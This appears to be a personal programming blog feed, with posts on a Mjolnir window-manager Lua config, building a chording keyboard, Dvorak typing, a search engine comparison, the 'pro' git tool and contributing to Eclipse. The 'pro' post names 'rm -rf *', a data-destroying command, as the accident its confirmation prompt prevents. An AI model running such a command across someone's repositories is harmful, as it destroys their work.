Personally I found the easiest way of doing window management was to use the mjolnir.bg.grid module. It provides functions that allow you to shuffle windows around a grid of a configurable number of rows and columns (3x3 by default). Here’s an example of some basic bindings inspired by this config:

local grid = require "mjolnir.sd.grid"
local hotkey = require "mjolnir.hotkey"

grid.MARGINX = 0
grid.MARGINY = 0
grid.GRIDWIDTH = 2
grid.GRIDHEIGHT = 2

-- a helper function that returns another function that resizes the current window
-- to a certain grid size.
local gridset = function(x, y, w, h)
    return function()
        cur_window = window.focusedwindow()
        grid.set(
            cur_window,
            {x=x, y=y, w=w, h=h},
            cur_window:screen()
        )
    end
end

local mash = {"ctrl", "shift"}
hotkey.bind(mash, 'n', grid.pushwindow_nextscreen)
hotkey.bind(mash, 'a', gridset(0, 0, 1, 2)) -- left half
hotkey.bind(mash, 's', grid.maximize_window)
hotkey.bind(mash, 'd', gridset(1, 0, 1, 2)) -- right half

Window Hints

One of my favourite parts of Mjolnir is that you can write your own modules in Lua and Objective C to hook into OSX functionality that Mjolnir doesn’t support by default. The great thing is other people have already written all sorts of modules to do things like controlling Spotify and playing sounds.

Recently I wrote my own module in 4 hours or so that adds the window hints feature that I missed from Slate: mjolnir.th.hints. Except I think I did it even better than Slate did. It allows you to quickly switch apps and windows using “hints” that pop up when you hit a key that have a letter on them, when you press the letter it switches to that app.

All you have to do is bind it to a key:

local hints = require "mjolnir.th.hints"
hotkey.bind({"cmd"},"e",hints.windowHints)
-- You can also use this with appfinder to switch to windows of a specific app
local appfinder = require "mjolnir.cmsj.appfinder"
hotkey.bind({"ctrl","cmd"},"k",function() hints.appHints(appfinder.app_from_name("Emacs")) end)

My Config

My personal config is a bit fancier and more specific to me than you might want to start off with, but you might want to get some ideas from it. You can find the latest version in my dotfiles repo, but I’ve included my config at the time of writing later on the page because it will probably be simpler than my config at the time you read this.

It has fancy features like rebinding the keys on keyboard layout change (which doesn’t always work). Probably the best feature is a crappy implementation of something that mimics Slate’s support for layouts.

Edit: see my dotfiles repo for the Hammerspoon version.

-- Load Extensions
local application = require "mjolnir.application"
local window = require "mjolnir.window"
local hotkey = require "mjolnir.hotkey"
local keycodes = require "mjolnir.keycodes"
local fnutils = require "mjolnir.fnutils"
local alert = require "mjolnir.alert"
local screen = require "mjolnir.screen"
-- User packages
local grid = require "mjolnir.bg.grid"
local hints = require "mjolnir.th.hints"
local appfinder = require "mjolnir.cmsj.appfinder"

local definitions = nil
local hyper = nil

local gridset = function(frame)
	return function()
		local win = window.focusedwindow()
		if win then
			grid.set(win, frame, win:screen())
		else
			alert.show("No focused window.")
		end
	end
end

auxWin = nil
function saveFocus()
  auxWin = window.focusedwindow()
  alert.show("Window '" .. auxWin:title() .. "' saved.")
end
function focusSaved()
  if auxWin then
    auxWin:focus()
  end
end

local hotkeys = {}

function createHotkeys()
  for key, fun in pairs(definitions) do
    local mod = hyper
    if string.len(key) == 2 and string.sub(key,2,2) == "c" then
      mod = {"cmd"}
    end

    local hk = hotkey.new(mod, string.sub(key,1,1), fun)
    table.insert(hotkeys, hk)
    hk:enable()
  end
end

function rebindHotkeys()
  for i, hk in ipairs(hotkeys) do
    hk:disable()
  end
  hotkeys = {}
  createHotkeys()
  alert.show("Rebound Hotkeys")
end

function applyPlace(win, place)
  local scrs = screen:allscreens()
  local scr = scrs[place[1]]
  grid.set(win, place[2], scr)
end

function applyLayout(layout)
  return function()
    for appName, place in pairs(layout) do
      local app = appfinder.app_from_name(appName)
      if app then
        for i, win in ipairs(app:allwindows()) do
          applyPlace(win, place)
        end
      end
    end
  end
end

function init()
  createHotkeys()
  keycodes.inputsourcechanged(rebindHotkeys)
  alert.show("Mjolnir, at your service.")
end

-- Actual config =================================

hyper = {"cmd", "alt", "ctrl","shift"}
-- Set grid size.
grid.GRIDWIDTH  = 6
grid.GRIDHEIGHT = 8
grid.MARGINX = 0
grid.MARGINY = 0
local gw = grid.GRIDWIDTH
local gh = grid.GRIDHEIGHT

local gomiddle = {x = 1, y = 1, w = 4, h = 6}
local goleft = {x = 0, y = 0, w = gw/2, h = gh}
local goright = {x = gw/2, y = 0, w = gw/2, h = gh}
local gobig = {x = 0, y = 0, w = gw, h = gh}

local fullApps = {
  "Safari","Aurora","Nightly","Xcode","Qt Creator","Google Chrome",
  "Google Chrome Canary", "Eclipse", "Coda 2", "iTunes", "Emacs", "Firefox"
}
local layout2 = {
  Airmail = {1, gomiddle},
  Spotify = {1, gomiddle},
  Calendar = {1, gomiddle},
  Dash = {1, gomiddle},
  iTerm = {2, goright},
  MacRanger = {2, goleft},
}
fnutils.each(fullApps, function(app) layout2[app] = {1, gobig} end)

definitions = {
  [";"] = saveFocus,
  a = focusSaved,

  h = gridset(gomiddle),
  t = gridset(goleft),
  n = grid.maximize_window,
  s = gridset(goright),

  g = applyLayout(layout2),

  d = grid.pushwindow_nextscreen,
  r = mjolnir.reload,
  q = function() appfinder.app_from_name("Mjolnir"):kill() end,

  k = function() hints.appHints(appfinder.app_from_name("Emacs")) end,
  j = function() hints.appHints(window.focusedwindow():application()) end,
  ec = hints.windowHints
}

-- launch and focus applications
fnutils.each({
  { key = "o", app = "MacRanger" },
  { key = "e", app = "Google Chrome" },
  { key = "u", app = "Emacs" },
  { key = "i", app = "iTerm" },
  { key = "m", app = "Airmail" }
}, function(object)
    definitions[object.key] = function() application.launchorfocus(object.app) end
end)

init()

Designing and Building a Keyboard: The Body

2014-09-08T00:00:00+00:00

This summer I set myself the task of designing and building a chording keyboard from scratch. Chording keyboards use a different system of typing where you type entire syllables or words in a single stroke by pressing multiple keys at a time. My keyboard is designed to use a system similar to Velotype. This should theoretically let me type at up to 200WPM.

To spoil the ending I managed to build a pretty sweet keyboard that I am using to type this very article. However, I haven’t written the chording software yet so I’m currently using it as a Dvorak keyboard.

Update 10/10/2016: I’ve been using the keyboard for 2 years now. I wrote the chording firmware and tried learning it but after a month I was still typing at 3wpm. But I did end up really liking the keyboard layout used normally so it’s still my primary keyboard. I’ve also upgraded the hardware with cool RGB LEDs. I use the palm keys with a set of Sublime Text shortcuts that is like VIM but the mode is set by the physical state of my palms. This integrates better with the mouse, I never type in the wrong mode, and it’s better for quickly doing something in another mode.

When I started the project I thought it might take 2 weeks to finish the hardware and then I would spend the rest of the summer on software. Boy was I wrong! It took me a month to finish the case and another month of evenings spent soldering after work. I managed to complete the hardware before heading off to Waterloo but only barely.

This post will be mostly about the case and key switches, next I’ll write about the electronics, then the layout (once I design it), and then the software (once I write it).

Overview

The Keys

One thing about chording keyboards is that since you have to press many keys at the same time, it is nice to have very low activation force key switches so that your hands don’t have to work as hard to press more switches.

The Velotype uses custom rubber dome switches with a 15g activation force but those require custom molded silicone sheets and a PCB. Instead I modified Cherry MX Red key switches, which are already some of the lowest force switches out there, and I cut the springs down from 1.5cm to 1.0cm. This gave them an activation force of around 20g instead of 45g.

For the key caps I pulled the black blank ones off my Das Keyboard since I figured that buying and shipping a new set of key caps would cost more than the resale value of my (now redundant) Das.

The Case

The case was made with layered acrylic sheets cut on the laser cutter at my local library. The layers are bolted together with machine screws with rubber feet at the bottom. The layout is my own design inspired by the Velotype Pro and the Erogdox. The top and bottom layers are thin black acrylic to give the keyboard a nice look and hide the internals. Features include a carrying handle, palm keys and a space for a LCD screen.

The Design

I did all the design in the (free!) student edition of AutoCad. I used cherry switch hole specs posted on the GeekHack forum that I fine tuned by laser cutting small test plates. Before doing the final cut in acrylic I cut one prototype in cheap MDF and also a one-button test keyboard in acrylic. This let me catch a couple design flaws and fine tune my CAD model before the final cut.

My original plan was to draw up the CAD files in two days and then cut them the next day, then spend the next couple days soldering. Turns out I dramatically underestimated the difficulty of designing quality hardware. It took me a week to do the CAD models alone. I had to design the layout, print multiple tests on paper to test ergonomics, then draw up the key cutouts, layout, case and internal pockets in AutoCad. Then I spent days tweaking the kerf, screw placement and PCB pocket size so that everything would fit together well.

The Full Story - Detailed Build Log

The Original Plan (Backstory, skip if you want)

This whole crazy quest started when I got the idea of trying to build a mag-lev hall effect keyboard. The switches would levitate on magnets inside shafts above a hall effect sensor, this would allow very smooth low force switches that gave back analogue signals. This would allow cool things like variable-speed WASD gaming and detection of different typing styles.

I made some crappy prototypes with fridge magnets and paper and it seemed promising so I ordered some hall effect sensors off Digikey and used OpenSCAD to design some 3D models for key switches. I 3D printed them at my library, the first time didn’t turn out well but I tweaked the model and got a decent print. However, the switches didn’t feel very good since smooth shaft sliding requires very tight tolerances that even the very nice SLA 3D printer I was using couldn’t make switches that didn’t wobble and scrape.

I ended up abandoning the project because after further testing I discovered that the magnets in adjacent switches would repel each other causing very weird responses and things like keys being twice as hard to press down when the adjacent one was down. This problem could only be solved by using springs to keep the key up and then switching to weaker magnets, or by shielding each key with something like mu-metal. This is a purely mechanical problem, the hall effect sensors actually weren’t interfered with much by adjacent magnets because they only measure the field strength in one axis.

The Real Quest Begins

After giving up on mag-lev I tried cutting the springs on a cherry brown switch and ended up with a decent low force key switch. Thus started the quest to build a custom chording keyboard. Goals included low force, low cost, ergonomic design, full programmability, and the ability to use it as a normal keyboard.

I started out by doing a bunch of research on other people’s custom keyboards and reading Geekhack threads and blog posts. I used some ideas from the Ergodox, the Atreus, and of course the Velotype Pro.

Drawing up the CAD File

The Layout

I started my layout off by just setting up a massive rectangular grid of keys in AutoCad, I then printed it off at actual size and used my own hand to stagger the columns to match my fingers. One major difference from normal keyboards is that the home row position of the pinky finger is actually on physical row down from the middle, an idea I took from the Velotype. This position is much nicer ergonomically given how short the pinky fingers are, it is just unconventional.

I then used the same print, measure, adjust model, repeat technique to place the thumb cluster and palm keys. The final step was tweaking the layout so that it could use a standard key cap set, this meant doing things like using 1.25U keys for the thumbs instead of 1.5 because there are more of them. While doing this I also kept in mind that each row of key caps has a different profile.

The final step was to mirror the one sided layout to the other side and then measure the natural distance between my hands in order to determine the separation.

The Rest of The Case

After drawing up the layout I had to design the rest of the case. I drew a box around the outside and then some interior pockets for the wiring. I measured the piece of perfboard and the LCD I had decided on and then put in pockets for those and added channels to the wiring pockets. Then I rounded all the corners to reduce the number of pointy edges as well as the risk of the acrylic cracking.

Finally I placed the bolt holes in locations that were structurally important and also were solid on all layers. I then measured where the screw holes were on the circuit boards and put those in on the bottom for mounting.

I had drawn the various pockets on different layers in AutoCad so I created a viewport for each physical layer of acrylic and then just set which layers I wanted drawn on each viewport. Bolt holes on all layers, switch holes on the plate layer, etc…

Acquiring Materials

Now that I had my CAD files it was time to acquire the acrylic I needed to cut them in. I called up the Laird Plastics in Ottawa and they had the acrylic I needed but only in $100 4 foot x 8 foot sheets. This was a great price per square foot but it was way more than I needed. So I checked out Canus Plastics and they had the exact acrylic thickness and colours I needed and they even cut me sheets of the size I wanted while I waited. I also went around the back to their dumpster and found some nice off-cuts for practice material.

I got 2 sheets of 43cmx24cm eighth inch black acrylic and 3 sheets of quarter inch 43cmx24cm clear acrylic for $50.

I also went to Home Depot and bought the right size of machine screws as well as some $3 sheets of MDF in the same thicknesses as my acrylic.

Stop, Prototype!

Switch Cutout Kerf

The first thing I wanted to tune was the tightness of my switch cutouts. My acrylic plate was quarter inch thick clear acrylic which is to thick for the switches to snap in so they are friction fit. This meant I had to get the fit very close because I had no PCB to hold the switches in and I didn’t want them popping out if I tried to take off the key caps or turned the keyboard upside down.

I ended up printing 6 different small acrylic test sheets including various insets and resizings of different cherry switch cutout shapes. I measured the results that came off the laser cutter with calipers and found that the laser had 0.2mm kerf in the material I was using.

After adjusting for the kerf I had to figure out how tight I wanted the switch holes. Here are the results of my testing, measured against the Cherry width spec of 19.05mm with calipers:

-0.15mm : Very loose fit, some play, can't pull keycap without pulling out switch.
Keyboard made like this would fall apart easily if it didn't have a PCB.
-0.10mm : Same as -0.15mm maybe imperceptibly tighter
0.00mm : Cherry Spec. Holds switches to be very robust without a PCB. Almost zero play.
Still not tight enough to pull a keycap without pulling out switch.
+0.05mm : Very nice solid fit. Can pull a keycap off without pulling switch.
+0.10mm : Quite tight without stressing switch.
Can easily pull keycap off without feeling switch move.
Takes effort to pop out.
I'm going to use this for my board since it won't have a PCB.

For my final version I decided on the +0.1mm inset (0.3mm including accounting for the laser kerf.).

I also printed some plates to test friction mounting the stabilizers. Turns out you can’t friction mount them and you have to make the slots wider and hot glue them. My CAD models include large stabilizer slots but I didn’t end up installing the stabilizers since they turned out to be unnecessary.

Cute Lil’ Mini Keyboard

To test the acrylic layering, the bolt holes and the border width, and cutting the acrylic I drew up a one key test keyboard that I printed and bolted together. It helped me discover that my bolt holes were too close to the edges for my rubber feet to fit. It also looks super cute. I left a hole for cable so that I can eventually hook it up in case I come up with a good idea for it.

MDF Prototype

So that I didn’t mess up my $50 acrylic sheets I did a test cut in $4 dollars worth of crappy MDF/hardboard and I’m glad I did. This prototype helped me discover that the USB cable didn’t really fit into the case cutout and that I had forgotten to turn some switch cutouts sideways. It also helped me be confident that the final cuts would turn out as I wanted them to.

Modifying Switches

After I cut the MDF prototype I spent 2 one hour sessions in the basement modifying key switches. For each switch I opened it using toothpicks, took out the spring and put it up against a ruler, grabbed it with my wire snippers at the correct point and moved it over a dish and snipped it. Then I put the switch back together and tested the feel. If a switch felt too light I tested it with a multimeter to make sure it didn’t stay down when I pressed it, if it did I tossed it into a rejects pile.

I only modified 46 switches, which was enough for all the keys used in chording, the extra keys which are only used for normal typing and special characters are unmodified. I did all 46 at around 1.5 minutes per switch median time with only 5 rejects (it took significantly longer for some switches because of additional testing).

The source switches were a bag of 110 Cherry MX Reds I bought for $50. I chose Cherry Reds because they work better for low force modification since they don’t have a tactile bump. When I tried modifying Browns sometimes the switch would get stuck on the bump on the way up.

After modifying the switches I mounted them in my MDF prototype with the low force switches in the right places and normal switches everywhere else. Afterwards I put my Das Keyboard key caps on making sure to use the correct rows. I then had a feel-complete version of my keyboard that I could try typing on, it was pretty nice!

Final Cutting

With all my prototyping done I biked to the library with my CAD files and acrylic sheets and spent an hour sitting next to a laser cutter while reading Hacker News and occasionally switching plates and printing a new file and sometimes watching the laser cutter slowly turn a featureless sheet into the keyboard I had been working on for a month.

Everything went excellently and I took my sheets home, bolted them together and tested that things fit. I then started transferring switches and keycaps from their respective positions on the MDF prototype to the final acrylic plate.

One interesting thing I discovered was how susceptible to fingerprints, hair and dust the layered acrylic design is. It doesn’t affect the functionality but it sure looks ugly. When assembling the layers I had to wear rubber gloves and wipe each layer down with a microfiber cloth before bolting them together.

After a while I had a look and feel complete version of my keyboard, now I just had the soldering to do, but that could wait. At this point I was halfway through the summer and I went on vacation from working during my vacation. I took my keyboard shell with me and occasionally practiced typing on the low force switches, just with the keyboard on my lap sitting by a lake with nothing connected to it.

Electronics

For the second month of the summer I worked at Shopify and every day when I got home I worked on designing the electronics and soldering up the key matrix and controller. There’s a lot more to tell about this process but this post is already 2,500 words.

Coming eventually, Part 2 “Designing and Building a Keyboard: The Mind”, in which I will detail the wiring, controller and basic firmware that make bring it to the functional state it is in now.

Update 10/10/2016: Sorry I still haven’t written the other parts. The firmware is on Github though. The electronics is a key matrix connected to a Teensy 3.1 and a MCP23017 multiplexer for more outputs.

Conclusion

With everything included, including prototyping materials, extra backup parts and shipping costs the total price came to $233. This figure does not include the dozens of hours of my own labor I put in.

I posted all the CAD files on Github including the AutoCAD files for the case, the Fritzing file for the controller board and the ruby scripts that generate OpenSCAD scripts that generate mag-lev key models.

For fun, here’s the checked off items of my To-Do list including most of the building and debugging steps (after a certain point when I started th e list). Don’t expect to understand it, it was written for my own reference.

- Design small one switch test layers
- Design PolyType logo plate (didn't turn out well)
- Go to Home Depot and buy 6-32 machine screws&nuts and 2'x2' MDF
- Laser cut switch test layers and logo plate in offcut acrylic
- Design circuit (to size perfboards properly)
- Test stabilizers on small acrylic test plate
- Disassemble Das Keyboard
- Finish full plate designs
- Use correct switch holes on plate design
- Modify 46 red switch springs.
- Add PCB holes to CAD file
- Cut MDF into 3 keyboard plate
- Order diodes, memory, IO expander on digikey
- Fix layout to not use stabilized velo keys
- Laser cut new plate for test cake
- Laser cut finished plate design in MDF
- Test sizing of PCB in MDF
- Mount cherry switches in MDF plate and put das caps on them
- Test feel of entire layout, is last chance to change it.
- USB slot on clear top layer
- turn long thumb key slots sideways
- make display screw holes bigger
- move ring finger column down
- shorter USB slot
- Laser cut finished plate in Acrylic
- Test fit of all plates together
- Test fit of components in pockets
- Mount all switches
- Wire up key matrix rows
- Install stabilizers
- Buy female headers and PCB screws
- Wire up matrix columns
- Solder controller board
- Wire matrix to controller board

Stay tuned for further parts of this saga!

A Tour of the Ruby Standard Library

2014-06-25T00:00:00+00:00

Recently I gave a full length talk at Ottawa Ruby on highlights of the Ruby standard library. It has elements suited to both beginner and advanced Rubyists.

The Ruby standard library is huge and awesome and this talk was designed to show off some of the cool parts of it that are helpful in everyday Ruby programming, and some that are mostly just useful for trivia.

I gave the talk on June 24, 2014.

Hacking Math Homework

2013-12-09T00:00:00+00:00

Many high school students complain about boring and repetitive homework, but I’ve found a fun way of dealing with this that I find actually helps me understand concepts even better. When faced with large rote assignments I write programs to complete the homework like no human can: instantly, perfectly and on a large scale. In the past I have written written Literary Analysis Visualizations, Punnet Square generators and Graphing Programs.

Most of the time it takes way more time to write the program than it would take to do the homework but I end up learning a lot more and having more fun. Recently I wrote my wrote my most outrageous program yet, it took 10 times longer than it should have and blew away my teacher and class.

Part of my Advanced Functions class summative this year was to create a series of piecewise functions that when graphed produce a picture. Some examples given were line drawings of a smiley face and the Batman symbol. But I had an idea that would go beyond the intended simple line drawings so I spent my weekend implementing it.

I wrote a program that takes an image and composes equations of varying densities into hundreds of massive piecewise functions so that when you graph them on a very large canvas and zoom out they replicate the image in greyscale. The output looks like this:

Additional Resources

Another part of the program outputs a massive Latex document with all the large piecewise functions that produces a huge PDF. You can download a PDF that explains all the parts and has some more examples.

The Program

The program is written in Python and uses matplotlib, Numpy and Pillow. Excuse the terrible code with the manual constants, global variables and terrible logic structure. Not only was I learning Python while writing this but I had to finish the program by the next day and then never use the program again.

Typing Faster

2013-09-30T00:00:00+00:00

What if you improved your typing speed from wpm to wpm?

Over years typing minutes per work day you could:

Spend times as much time typing saving hours.
Or type times as many words jumping from million words typing to million words.

If you earn per hour the extra productivity is worth .

Learning to Type Efficiently in 3 Weeks

Are you satisfied with your current typing speed? Do you even know what speed you type at? If you don’t know go test yourself on KeyHero, I’ll wait. Typing faster and in the correct way has many advantages including productivity gains, ergonomics and ability to look at the screen while typing. However, not everyone can simply practice typing and improve their speed, sometimes more drastic action is required. With the right method you can improve your speed from 25 wpm to 60 wpm in 3 weeks of casual effort like I did. Two years later I now type properly at 80 wpm with no dedicated practice since those 3 weeks.

Most people improve their typing speed through practice on sites like KeyHero. This approach works in some cases but there are some cases where this approach is ineffective. In order for your practice to be effective you have to continue typing faster and correctly afterwards during normal computer use. For many years I typed at a dismal speed of 25 wpm with incorrect fingering and my eyes firmly focused on my keyboard. I tried to practice typing correctly and would get up to 20 wpm without looking at the keyboard but as soon as I was done and I wanted to program or chat with friends I would go back to my slightly faster but incorrect method of typing and lose my progress. No matter how hard you practice if you immediately go back to looking at your keyboard or typing improperly afterwards you won’t get any faster.

Salvation came a couple years ago when I discovered a method of kicking out my typing crutches: learning Dvorak. Dvorak is a keyboard layout with a much more efficient design with the most common letters on the home row. It is supposedly more efficient but I couldn’t care less about that, what mattered to me is that all the keys were in different positions and the labels on the keys were wrong. I basically threw away everything I knew about typing and started afresh typing properly and efficiently, at 0 wpm. After a weekend of studying I had learned the layout. In only a week I beat my previous speed. In 2 weeks I doubled it and in 3 weeks I was typing at 60 wpm. Interestingly, I was only practicing about one hour per day. The important thing was that I never switched my computer off of Dvorak and did everything in the new layout.

By starting from the beginning on a keyboard layout where you can’t cheat and look at keys, you can eliminate the bad habits that prevent you from becoming a fast typist. If you look at your keyboard while you type you miss helpful auto-complete popups and typos you have made, leading to drastically lower effective wpm. Not only this but if you truly need to look you are limiting your typing speed to how fast you can target the next letter.

Unlike Colemak, the Dvorak layout is available by default on most versions of OSX, Windows and Linux so even if you have to use someone else’s computer you can switch the layout. You don’t have to buy a special keyboard and you might even get ergonomic benefits from using a more efficient layout and not having to contort your fingers so much. After a few years of using Dvorak I haven’t had any problems with using other people’s computers or keyboards. You can always fall back on hunt and peck if you can’t be bothered to change the layout setting.

If your typing speed is below 40wpm or you have to look at the keyboard I highly recommend you learn Dvorak to get rid of your bad habits and improve your speed. This trick helped me immensely and if you have trouble typing quickly because of bad habits, it can help you too.

Specifics

To initially learn the basic layout so that I could type every letter, albeit slowly, I used two methods. I practiced with lessons on dvorak.nl and printed off a sheet with the layout so that I could memorize it away from the computer. I did this all in 2 days of focus so that I wouldn’t have to switch back to QWERTY between practices to get things done.

Once I could type everything I needed to I started using KeyHero, which is a nicer platform for both practicing and tracking your progress. I also used Dvorak for everyday things like programming and writing. I was slow to begin with but very soon I could type faster than before.

The Best Search Engine For Programmers

2013-05-17T00:00:00+00:00

There are many different comparisons of search engine results out there but I thought I would do one specifically geared towards the audience I identify with: programmers.

Do note that these tests are not rigorous and are based on my observations of which search engine delivers the best results from a programmer’s perspective for a number of programming related searches.

The tests were conducted using Google Chrome in Incognito mode while signed out of any accounts I had with the site in question.

I will be comparing the following search engines:

Google
Bing
DuckDuckGo: This will be particularly interesting since DDG has a number of features geared towards geeks and programmers.
Samuru: A cool new search engine based on natural language processing.

1. Slate

Slate is a window management tool for OSX which I have written about before. The correct first result should probably be Slate magazine but the geeky result I am looking for is the window manager. Since Slate is not as popular as my other search terms I threw this one in as a tough start to the comparison.

Results

Google actually got it as the second result! I was so stunned by this that I thought Google was tracking me even with incognito. But I got one of my non-geeky friends to Google it and he got it as a result as well.

All the other search engines returned the magazine first and then the rock.

Winner

Google by a long shot! I only tried this one because I thought none of them would get it.

2. Chef

If a programmer searches for “Chef” they are probably referring to the automation platform by Opscode. What I am looking for is results that talk about Chef, preferably from OpsCode.

Results

All search engines had OpsCode Chef on the first page but only some had it in the top 3.

Winner

Google was the only search engine that returned Chef in the top 3 results and it put it as the first result.

3. Node

This is an interesting one since even as a programmer it is tough to figure out if the correct result is a networking node or Node.js.

Results

Winner

Depends on your personal preferences. Google and Samuru put nodejs.org first and Bing and DDG put networking nodes first. Bing is the only one that does not mention both.

4. Underscore

Should refer to underscore.js. No screenshots for this one because I have already made you scroll too much.

Google: 2/3 including top result are underscore.js DuckDuckGo: 1/3 Bing: 0/3 Samuru: Samuru gave underscore.js as third result on first search but because of the way the engine works it gave 3 articles about the character 30s later after it had done more processing.

5. Ruby

Interestingly, every search engine got the Ruby language as the top result except for Bing, which gave the gem as the top result.

Overall Winner

Google is the only search engine that returned the results that a programmer would be looking for every time. It seems the worst of the 4 search engines was Bing, which got many things and even something as simple as Ruby wrong.

Too Many Projects, Not Enough pro

2013-05-01T00:00:00+00:00

I have too many projects, so I started a new project to solve my problems. This project is a little tool called pro which allows you to easily deal with all your git repositories.

It has a handful of very useful features, each of which solves a problem that I have experienced. I imagine they will be useful to others as well. You can get pro by running gem install pro.

Do note that a Unix system is required to use this, so it won’t work on Windows without Cygwin.

CD’ing to a project’s repository

Cd’ing to your projects is harder than it should be. There are many tools that try and solve this problem using frequency and recency. Pro solves the problem by fuzzy searching only git repositories.

The pd command allows you to instantly CD to any git repo by fuzzy matching its name. You can install the pd tool (name configurable) by running pro install. Once you have it you can do some pretty intense cd’ing:

State of the Repos Address

Oftentimes I find myself wondering which git repositories of mine still have uncommitted changes or unpushed commits. I could find them all and run git status but it would be nice to get a quick overview. pro status does this.

You can also run pro status <repo> to show the output of git status for a certain repo.

Run all the commands!

Wouldn’t it be cool if you could run a command on all your repos and see a summary of the output? Now you can!

You can do this with pro run <command>. If you don’t pass a command it will prompt you for one.

For example, searching all your repos for ruby files:

Notice that it double checks before running so you don’t accidentally run rm -rf * on all your projects.

The Pro Base

Pro can use a base directory to speed up its search for git repos. By default it uses your home folder.

To set the base directory either create a file at ~/.proBase containing the base path or set the environment variable PRO_BASE to the path.

Conclusion

pro is a handy tool that makes working with lots of git repos much easier. If you want to get it run gem install pro. You can also check it out on Github.

The Best Programming Game

2013-04-10T00:00:00+00:00

Ever since I was in grade 4 I have been playing the world’s best programming game. The game is highly rewarding, an excellent way to learn programming and it’s even free!

This game has many advantages over other programming video games:

Like Minecraft, it is open-ended and allows players to set their own goals.
It allows players to use any library and programming language they want to.
The game can lead to real world rewards and recognition. It has MLG players and top gamers can earn hundreds of thousands of dollars per year.
It can run on any computer regardless of how recently it was made or what OS it runs.
It even has multiplayer support! You can play with friends and even post your solutions to the puzzles online.

Have you guessed what game it is yet? Does it sound interesting?

The game is called “Just Friggin Program” and it works like this:

Think of a program you would like to write.
Use the internet to learn things.
Write the program!
You beat the level! Repeat for the next level.

I am now 17 and I have gotten a lot of fun out of playing this game for the last 8 years. I have learned everything I know about programming through playing and I’m sure many other programmers have too. The best part is I have ended up with a portfolio of cool projects while players of other games just have their “levels completed” screen to show for it.

Instead of introducing children to brand new 3D “learn-to-program” games I suggest the oldest game of them all as the best way to teach kids to programming.

Contributing to Eclipse

2013-03-29T00:00:00+00:00

Background

When most programmers think of Eclipse they think of the Java IDE but Eclipse is actually a huge group of projects with very little relation to each other except that they are all managed by The Eclipse Foundation.

I had the privilege of working for The Eclipse Foundation this past semester at school as a High School co-op job. The Foundation does not actually employ developers but since I was working for free I was able to actually work on the code base with expert guidance from my supervisor Wayne Beaton at the Foundation.

This was an interesting experience. I worked on fixing bugs in various Eclipse projects including one that had been around for 11 years and likely affected thousands of developers. In this article I hope to share some of the knowledge I gathered about contributing to Eclipse projects.

Edit: To clarify, I am not ranting about how bad my job was. I thoroughly enjoyed my time at The Eclipse Foundation. I also enjoy using Eclipse as an IDE. Yes it is slow and RAM-intensive but it’s amazing auto complete and content assist make it invaluable for Java programming. I use VIM for every other language.

One Does Not Simply Compile Eclipse

For my first week my supervisor had the idea of using me to figure out how difficult it is to be a new contributor to Eclipse. I was given a bug to fix and no other instruction.

I started off with the assumption that I would have to compile Eclipse. Which seemed reasonable enough given my experience with other open source projects.

Unfortunately, I was dead wrong. I spent many hours reading through outdated wiki pages and filling up my hard drive with build files until my supervisor eventually told me what I had only seen briefly mentioned in a paragraph full of adjectives: you do not need to compile Eclipse to develop it.

The One True Path

Eclipse is actually developed within Eclipse using a plugin called the Plugin Development Toolkit (PDT). This sounds like it is only useful for developing plugins, and it is.

The thing is Eclipse is actually almost entirely made up of Eclipse plugins. This is an excellent architecture once you start developing for it but it is not necessarily easy for new contributors.

Working on an Eclipse Project

Before following this procedure make sure you have the PDT plugin and the EGit plugin installed.

This procedure only applies to plugins that are plugins to the Eclipse IDE.

Clone the right repository in EGit.
- You can find all the repositories at http://git.eclipse.org/c/
- You only need the repository you will be working on directly, it will use the binary plugins in your Eclipse installation for dependencies.
- Make sure to select the import projects box in the clone dialog.
Create a new ‘Eclipse Application’ run configuration.
Make changes to the code and run or debug your configuration.

This will launch another copy of Eclipse with the changes that you have made. You can even set breakpoints and run it in the debugger.

Bugzilla

All Eclipse bugs are tracked on http://bugs.eclipse.org/. They use the loose definition of the term ‘bug’ that includes feature requests and things that should be made better.

Any code contribution you make as a non-commiter (which you probably are if you are reading this article) must be made through Bugzilla. If you write a new feature and want to contribute it you should create a new bug saying the feature should be added and immediately submit a patch file.

You can either submit a patch by attaching a patch file to the bug or on some projects by submitting a pull request with the bug id in the title to the Github mirror of the project. Keep in mind that not all projects have active committers on Github to see your pull request so you may want to link to it from the bug.

Next Steps

With any luck a committer will see your patch and write a comment about it. This could take anywhere from a day to many months depending on how active the project is.

On some of my patches I got a helpful response within hours, on others I only got a reply weeks later and some of my patches are still sitting there to this day…

The committer may recommend some changes to your patch to fix bugs or make it better. Once your patch is good enough the developer will commit it. They may ask you some questions about originality or have you fill out a form as part of the intellectual property process. I think my supervisor said they should have had me fill out a form but they never did.

Congratulations! You may now enjoy the warm fuzzy feeling that comes from contributing to an Eclipse project!

My Own Journey

I submitted patches for many bugs during my time at The Foundation. I fixed many small bugs like having the Javadoc for a function show up in the Javadoc view when you select it with autoComplete.

Some of my larger achievements:

Helping fix bugs related to Retina displays so that Eclipse displays crisply on new Retina MacBook Pros.
Updating the Eclipse Ruby DLTK project to support debugging ruby 1.9+ using the ‘debugger’ gem instead of the outdated ‘ruby-debug’ gem on 1.8.

My biggest achievement was fixing an 11 year old bug that affects any Eclipse user who has ever had to forcefully stop Eclipse and then lost their place in what they were working on. Bug 2369.

Eclipse is very good at auto-saving state when it is shut down properly but many users like myself keep Eclipse open constantly and only ever start it up again when it crashes or our computer crashes.

The reason nobody experienced had taken it on was probably because it was very difficult. I toiled for weeks chasing through layer upon layer of abstraction trying to untie the workbench save code from the shutdown code.

I eventually settled upon copying the entire workbench model and then cleaning up the parts that were not supposed to be persisted in the copy. I gradually found what parts had to be removed from the model by chasing the causes of various duplicate menu items and toolbars.

I managed to fix the bug just one week before my coop term ended. And I got to feel that warm fuzzy open source contribution feeling knowing that I made a difference people would notice. And they did:

@mmmandel wow, a 4 digit bug number. You can almost see the evolution of the platform UI team by reading through the comments.
— Ian Bull (@irbull) March 14, 2013

Ottawa Ruby Lightning Talks

2013-02-06T00:00:00+00:00

I have attended the Ottawa Group of Ruby Enthusiasts (http://ottawaruby.ca/) for about a year now. It has been a great place to meet other Ruby developers and learn interesting things.

The group normally has a main speaker who gives a long talk and one or two 10 minute lightning talks punctuated by breaks to eat pizza and talk. The main talk is normally over Skype and the lightning talks are done by volunteers from the group.

I have given two lightning talks on topics which I believed I might know more than other members. Both talks went well and I’ve decided to post the slides. Be aware that I did do a significant amount of talking so you can’t get the whole message from just the slides, but they are better than nothing.

Edit: The Ruby Standard Library

I recently did a full length talk on the Ruby standard library. You can find the slides at http://thume.ca/rubytour.

Ruby + Programming Contests

